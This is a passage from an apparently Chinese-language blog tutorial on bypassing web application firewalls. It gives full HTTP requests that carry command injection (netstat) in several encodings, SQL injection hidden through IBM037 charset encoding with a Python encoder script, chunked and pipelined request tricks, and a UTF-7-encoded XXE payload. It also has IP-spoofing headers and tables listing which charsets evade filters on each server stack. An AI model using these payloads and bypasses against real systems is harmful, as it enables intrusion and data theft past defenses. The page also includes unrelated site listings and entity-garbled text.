zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 HPP.Last_test GET /get/?id&＃61;test&id&＃61;test&id&＃61;test&id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 SpaceEncoding 对空格进行编码原始攻击 GET /get/?id&＃61;;netstat%20-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 URL编码 %u编码 GET /get/?id&＃61;;netstat%u0000-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 Double URL GET /get/?id&＃61;;netstat%2500-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 Double Double GET /get/?id&＃61;;netstat%25%30%30-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 HEX GET /get/?id&＃61;;netstatx00-ant HTTP/1.1 Host: 10.100.12.249:8080 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,*/*;q&＃61;0.8 Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Connection: close COOKIE: JSESSIONID&＃61;B4640D0258CA8C041F8102EE58A1E76B Upgrade-Insecure-Requests: 1 Content-Length: 6 0X04 绕过实战案例一&＃xff1a;字符编码绕过WAF 在进行测试时候发现下面这段请求被拦截,很明显带有注入特征 POST /sample.aspx?input0&＃61;something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Content-Length: 41input1&＃61;&＃39;union all select * from users-- 我们使用下面的编码技术进行编码绕过 import urllibdef paramEncode(params&＃61;"", charset&＃61;"IBM037", encodeEqualSign&＃61;False, encodeAmpersand&＃61;False, urldecodeInput&＃61;True, urlencodeOutput&＃61;True):result &＃61; ""equalSign &＃61; "&＃61;"ampersand &＃61; "&"if encodeEqualSign:equalSign &＃61; equalSign.encode(charset)if encodeAmpersand:ampersand &＃61; ampersand.encode(charset)params_list &＃61; params.split("&")for param_pair in params_list:param, value &＃61; param_pair.split("&＃61;")if urldecodeInput:param &＃61; urllib.unquote(param).decode(&＃39;utf8&＃39;)value &＃61; urllib.unquote(value).decode(&＃39;utf8&＃39;)param &＃61; param.encode(charset)value &＃61; value.encode(charset)if urlencodeOutput:param &＃61; urllib.quote_plus(param)value &＃61; urllib.quote_plus(value)if result:result &＃43;&＃61; ampersandresult &＃43;&＃61; param &＃43; equalSign &＃43; valuereturn result# for IIS print paramEncode("input1&＃61;&＃39;union all select * from users--")# prints %89%95%97%A4%A3%F1&＃61;%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60 编码后变成下面这段请求&＃xff0c;可以成功进行bypass POST /sample.aspx?%89%95%97%A4%A3%F0&＃61;%A2%96%94%85%A3%88%89%95%87 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;ibm037 Content-Length: 115%89%95%97%A4%A3%F1&＃61;%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60 目标 Post(application/x-www-form-urlencoded) Nginx&＃xff0c;uWSGI-Django-Python3 IBM037&＃xff0c;IBM500&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM273 Nginx&＃xff0c;uWSGI-Django-Python2 IBM037&＃xff0c;IBM500&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM424 Apache-TOMCAT8-JVM1.8-JSP IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c;IBM278&＃xff0c;IBM280&＃xff0c; IBM284&＃xff0c;IBM285&＃xff0c;IBM290&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM424&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;cp1025 Apache-TOMCAT7-JVM1.6-JSP IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c;IBM278&＃xff0c;IBM280&＃xff0c; IBM284&＃xff0c;IBM285&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM424&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;cp1025 Apache -PHP5&＃xff08;mod_php和FastCGI&＃xff09; None IIS8-PHP7.1-FastCGI None IIS6、7.5、8、10 -ASP经典 None IIS6、7.5、8、10 -ASPX&＃xff08;v4.x&＃xff09; IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01047&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;unicodeFFFE&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c; IBM278&＃xff0c;IBM280&＃xff0c;IBM284&＃xff0c;IBM285&＃xff0c;IBM290&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM423&＃xff0c;IBM424&＃xff0c;x-EBCDIC-KoreanExtended&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;IBM880&＃xff0c;IBM905&＃xff0c;IBM00924&＃xff0c;cp1025 案例二&＃xff1a;编码绕过WAF 在xxe攻击中&＃xff0c;以下攻击被WAF拦截 POST /bWAPP/xxe-2.php HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Content-type: text/xml; charset&＃61;UTF-8 Content-Length: 228 Connection: close COOKIE: security_level&＃61;0; PHPSESSID&＃61;605bac73f50d32d09e96fd20a3df17e8 ]> &test; login 对关键payload进行utf-7编码&＃xff0c;成功绕过 POST /bWAPP/xxe-2.php HTTP/1.1 Host: 192.168.1.101 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Accept-Language: zh-CN,zh;q&＃61;0.8,zh-TW;q&＃61;0.7,zh-HK;q&＃61;0.5,en-US;q&＃61;0.3,en;q&＃61;0.2 Accept-Encoding: gzip, deflate Content-type: text/xml; charset&＃61;UTF-8 Content-Length: 228 Connection: close COOKIE: security_level&＃61;0; PHPSESSID&＃61;605bac73f50d32d09e96fd20a3df17e8 &＃43;ADwAIQBFAE4AVABJAFQAWQAgAHQ-e&＃43;AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e&＃43;AHQAYwAvAHAAYQBzAHMAdwBvAHI-d&＃43;ACIAPg- ]> &test; login 案例三&＃xff1a;Chunked 绕过WAF 在进行测试时候发现下面这段请求被拦截,很明显带有注入特征 POST /sample.aspx?input0&＃61;something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Content-Length: 41input1&＃61;&＃39;union all select * from users-- 在头部加入 Transfer-Encoding: chunked 之后&＃xff0c;就代表这个报文采用了分块编码。这时&＃xff0c;post请求报文中的数据部分需要改为用一系列分块来传输。每个分块包含十六进制的长度值和数据&＃xff0c;长度值独占一行&＃xff0c;长度不包括它结尾的&＃xff0c;也不包括分块数据结尾的&＃xff0c;且最后需要用0独占一行表示结束。 POST /sample.aspx?input0&＃61;something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Content-Length: 110 Transfer-Encoding: chunked5; input 4; 1&＃61;&＃39;u 5; nion 4; all 5; selec 4; t * 4; from 5;user 3; s-- 0 案例四&＃xff1a;pipline绕过WAF 原始请求带有明显特征被拦截 GET /sample.aspx?input0&＃61;something&input1&＃61;&＃39;union&＃43;all&＃43;select&＃43;*&＃43;from&＃43;users-- HTTP/1.1 HOST: victim.com http协议是由tcp协议封装而来&＃xff0c;当浏览器发起一个http请求时&＃xff0c;浏览器先和服务器建立起连接tcp连接&＃xff0c;然后发送http数据包&＃xff0c;其中包含了一个Connection字段&＃xff0c;一般值为close&＃xff0c;apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大&＃xff0c;超过一个http包容量&＃xff0c;需要分多次发送时&＃xff0c;值会变成keep-alive&＃xff0c;即本次发起的http请求所建立的tcp连接不断开&＃xff0c;直到所发送内容结束Connection为close为止。下面请求包可能存在绕过&＃xff1a; GET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Connection:keep-aliveGET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Connection:keep-aliveGET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Connection:keep-aliveGET / HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset&＃61;utf-8 Connection:keep-aliveGET /sample.aspx?input0&＃61;something&input1&＃61;&＃39;union&＃43;all&＃43;select&＃43;*&＃43;from&＃43;users-- HTTP/1.1 HOST: victim.com web 安全服务器漏洞 ip http get int cookie 写下你的评论吧 ! 吐个槽吧,看都看了会员登录 | 用户注册推荐阅读 format 【机器学习】生成式对抗网络模型综述生成式对抗网络模型综述摘要生成式对抗网络模型(GAN)是基于深度学习的一种强大的生成模型，可以应用于计算机视觉、自然语言处理、半监督学习等重要领域。生成式对抗网络 ... [详细] 蜡笔小新 2023-12-14 17:51:18 plugins 在Windows 8上安装gvim中的插件的错误加载问题本文讨论了在Windows 8上安装gvim中插件时出现的错误加载问题。作者将EasyMotion插件放在了正确的位置，但加载时却出现了错误。作者提供了下载链接和之前放置插件的位置，并列出了出现的错误信息。 ... [详细] 蜡笔小新 2023-12-14 14:44:00 int CSS3选择器的使用方法详解，提高Web开发效率和精准度本文详细介绍了CSS3新增的选择器方法，包括属性选择器的使用。通过CSS3选择器，可以提高Web开发的效率和精准度，使得查找元素更加方便和快捷。同时，本文还对属性选择器的各种用法进行了详细解释，并给出了相应的代码示例。通过学习本文，读者可以更好地掌握CSS3选择器的使用方法，提升自己的Web开发能力。 ... [详细] 蜡笔小新 2023-12-14 14:37:52 c语言树莓派语音控制的配置方法和步骤本文介绍了在树莓派上实现语音控制的配置方法和步骤。首先感谢博主Eoman的帮助，文章参考了他的内容。树莓派的配置需要通过sudo raspi-config进行，然后使用Eoman的控制方法，即安装wiringPi库并编写控制引脚的脚本。具体的安装步骤和脚本编写方法在文章中详细介绍。 ... [详细] 蜡笔小新 2023-12-12 03:02:49 int Python脚本编写创建输出数据库并添加模型和场数据的方法本文介绍了使用Python脚本编写创建输出数据库并添加模型数据和场数据的方法。首先导入相应模块，然后创建输出数据库并添加材料属性、截面、部件实例、分析步和帧、节点和单元等对象。接着向输出数据库中添加场数据和历程数据，本例中只添加了节点位移。最后保存数据库文件并关闭文件。文章还提供了部分代码和Abaqus操作步骤。另外，作者还建立了关于Abaqus的学习交流群，欢迎加入并提问。 ... [详细] 蜡笔小新 2023-12-09 09:41:06 command Linux重启网络命令实例及关机和重启示例教程本文介绍了Linux系统中重启网络命令的实例，以及使用不同方式关机和重启系统的示例教程。包括使用图形界面和控制台访问系统的方法，以及使用shutdown命令进行系统关机和重启的句法和用法。 ... [详细] 蜡笔小新 2023-12-14 15:52:52 plugins Android Studio Bumblebee | 2021.1.1（大黄蜂版本使用介绍）本文介绍了Android Studio Bumblebee | 2021.1.1（大黄蜂版本）的使用方法和相关知识，包括Gradle的介绍、设备管理器的配置、无线调试、新版本问题等内容。同时还提供了更新版本的下载地址和启动页面截图。 ... [详细] 蜡笔小新 2023-12-14 10:34:15 jsp 知识图谱——机器大脑中的知识库本文介绍了知识图谱在机器大脑中的应用，以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例，说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案，如搜索关键词"Marie Curie"，会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革，不仅美国的微软必应，中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细] 蜡笔小新 2023-12-14 10:06:19 jsp 计算机存储系统的层次结构及其优势本文介绍了计算机存储系统的层次结构，包括高速缓存、主存储器和辅助存储器三个层次。通过分层存储数据可以提高程序的执行效率。计算机存储系统的层次结构将各种不同存储容量、存取速度和价格的存储器有机组合成整体，形成可寻址存储空间比主存储器空间大得多的存储整体。由于辅助存储器容量大、价格低，使得整体存储系统的平均价格降低。同时，高速缓存的存取速度可以和CPU的工作速度相匹配，进一步提高程序执行效率。 ... [详细] 蜡笔小新 2023-12-13 17:32:41 int 关于数论的开发笔记本文由编程笔记#小编整理，主要介绍了关于数论相关的知识，包括数论的算法和百度百科的链接。文章还介绍了欧几里得算法、辗转相除法、gcd、lcm和扩展欧几里得算法的使用方法。此外，文章还提到了数论在求解不定方程、模线性方程和乘法逆元方面的应用。摘要长度：184字。 ... [详细] 蜡笔小新 2023-12-11 17:31:53 config SpringBoot整合SpringSecurity+JWT实现单点登录 SpringBoot整合SpringSecurity+JWT实现单点登录,Go语言社区,Golang程序员人脉社 ... [详细] 蜡笔小新 2023-12-11 08:21:41 dll Wince程序内存和存储内存的分析及作用本文分析了Wince程序内存和存储内存的分布及作用。Wince内存包括系统内存、对象存储和程序内存，其中系统内存占用了一部分SDRAM，而剩下的30M为程序内存和存储内存。对象存储是嵌入式wince操作系统中的一个新概念，常用于消费电子设备中。此外，文章还介绍了主电源和后备电池在操作系统中的作用。 ... [详细] 蜡笔小新 2023-12-10 16:21:27 int JNI原理及常用方法概述本文概述了JNI的原理以及常用方法。JNI提供了一种Java字节码调用C/C++的解决方案，但引用类型不能直接在Native层使用，需要进行类型转化。多维数组（包括二维数组）都是引用类型，需要使用jobjectArray类型来存取其值。此外，由于Java支持函数重载，根据函数名无法找到对应的JNI函数，因此介绍了JNI函数签名信息的解决方案。 ... [详细] 蜡笔小新 2023-12-09 17:55:40 int Ubuntu 11.10 x64环境下安装Android开发环境及解决常见问题本文介绍了在Ubuntu 11.10 x64环境下安装Android开发环境的步骤，并提供了解决常见问题的方法。其中包括安装Eclipse的ADT插件、解决缺少GEF插件的问题以及解决无法找到'userdata.img'文件的问题。此外，还提供了相关插件和系统镜像的下载链接。 ... [详细] 蜡笔小新 2023-12-09 09:41:58 int 如何使用PLEX播放组播、抓取信号源以及设置路由器本文介绍了如何使用PLEX播放组播、抓取信号源以及设置路由器。通过使用xTeve软件和M3U源，用户可以在PLEX上实现直播功能，并且可以自动匹配EPG信息和定时录制节目。同时，本文还提供了从华为itv盒子提取组播地址的方法以及如何在ASUS固件路由器上设置IPTV。在使用PLEX之前，建议先使用VLC测试是否可以正常播放UDPXY转发的iptv流。最后，本文还介绍了docker版xTeve的设置方法。 ... [详细] 蜡笔小新 2023-12-09 01:31:00 吴这个家伙很懒，什么也没留下！ Tags | 热门标签 callback string settings post replace actionscrip frameworks keyword nodejs vba testing instance erlang php regex grid perl int plugins substring config bitmap format byte jsp dll c语言 httpclient command eval RankList | 热门文章 1java session代码_javasession(示例代码) 2相机标定（一）：机器人手眼标定 3Vue 构造器 4用Java socket编程，读服务器几个字符，再写入本地显示 5vue限制只能输入数字_vue限制只能输入正负数及小数 6如何根据列值的条件删除数据框中的行？ 7通过原型搜索Hibernate`Example` 8day26学习总结与作业 9【LeetCode】105 & 106. Construct Binary Tree from Inorder and Postorder Traversal 10关于牛顿迭代法的初值以及收敛性的理解 11vuex的简易入门 12【Nunit入门系列讲座 5】Nunit如何测试程序中的异常 —— 初识异常及异常测试 13流媒体影响力 14php短连接解析,php 短链接算法收集与分析 15如何使用键盘快捷键强制退出苹果Mac无响应应用程序？ PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具 Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区版权所有

原始请求	插件改变后
X-Originating-IP&＃xff1a;原始IP	X-Originating-IP&＃xff1a;127.0.0.1
X-Forwarded-For&＃xff1a;原始IP	X-Forwarded-For&＃xff1a;127.0.0.1
X-Remote-IP&＃xff1a;原始IP	X-Remote-IP&＃xff1a;127.0.0.1
X-Remote-Addr&＃xff1a;原始IP	X-Remote-Addr&＃xff1a;127.0.0.1

原始请求	结果
Content-Type&＃xff1a;原始	Content-Type&＃xff1a;原始
Content-Type&＃xff1a;原始	删除Content-Type
Content-Type&＃xff1a;原始	Content-Type: invalid
Content-Type&＃xff1a;原始	Content-Type: example
Content-Type&＃xff1a;原始	Content-Type: multipart/
Content-Type&＃xff1a;原始	Content-Type: multipart/digest
Content-Type&＃xff1a;原始	Content-Type: multipart/digest; boundary&＃61;0000
Content-Type&＃xff1a;原始	Content-Type: multipart/; boundary&＃61;0000

目标	Post(application/x-www-form-urlencoded)
Nginx&＃xff0c;uWSGI-Django-Python3	IBM037&＃xff0c;IBM500&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM273
Nginx&＃xff0c;uWSGI-Django-Python2	IBM037&＃xff0c;IBM500&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM424
Apache-TOMCAT8-JVM1.8-JSP	IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c;IBM278&＃xff0c;IBM280&＃xff0c; IBM284&＃xff0c;IBM285&＃xff0c;IBM290&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM424&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;cp1025
Apache-TOMCAT7-JVM1.6-JSP	IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c;IBM278&＃xff0c;IBM280&＃xff0c; IBM284&＃xff0c;IBM285&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM424&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;cp1025
Apache -PHP5&＃xff08;mod_php和FastCGI&＃xff09;	None
IIS8-PHP7.1-FastCGI	None
IIS6、7.5、8、10 -ASP经典	None
IIS6、7.5、8、10 -ASPX&＃xff08;v4.x&＃xff09;	IBM037&＃xff0c;IBM500&＃xff0c;IBM870&＃xff0c;cp875&＃xff0c;IBM1026&＃xff0c;IBM01047&＃xff0c;IBM01140&＃xff0c;IBM01141&＃xff0c;IBM01142&＃xff0c;IBM01143&＃xff0c;IBM01144&＃xff0c;IBM01145&＃xff0c;IBM01146&＃xff0c;IBM01147&＃xff0c;IBM01148&＃xff0c;IBM01149&＃xff0c;utf-16&＃xff0c;unicodeFFFE&＃xff0c;utf-32&＃xff0c;utf-32BE&＃xff0c;IBM273&＃xff0c;IBM277&＃xff0c; IBM278&＃xff0c;IBM280&＃xff0c;IBM284&＃xff0c;IBM285&＃xff0c;IBM290&＃xff0c;IBM297&＃xff0c;IBM420&＃xff0c;IBM423&＃xff0c;IBM424&＃xff0c;x-EBCDIC-KoreanExtended&＃xff0c;IBM-Thai&＃xff0c;IBM871&＃xff0c;IBM880&＃xff0c;IBM905&＃xff0c;IBM00924&＃xff0c;cp1025